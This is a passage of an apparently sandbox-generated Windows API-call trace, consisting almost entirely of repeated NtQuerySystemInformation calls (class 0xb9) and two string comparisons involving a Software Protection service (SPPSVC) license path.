(SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x28, ResultLength=0x0) [0272.123] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0272.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0272.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0272.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0272.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0272.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0272.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0272.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0272.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x28, ResultLength=0x0) [0272.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x28, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x20, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x20, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x28, ResultLength=0x0) [0272.134] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0272.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x28, ResultLength=0x0) [0272.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x28, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x20, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x20, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x28, ResultLength=0x0) [0272.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0272.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6e0, Length=0x20, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0272.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x28, ResultLength=0x0) [0272.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6e0, Length=0x20, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0272.184] NtQuerySystemInformation 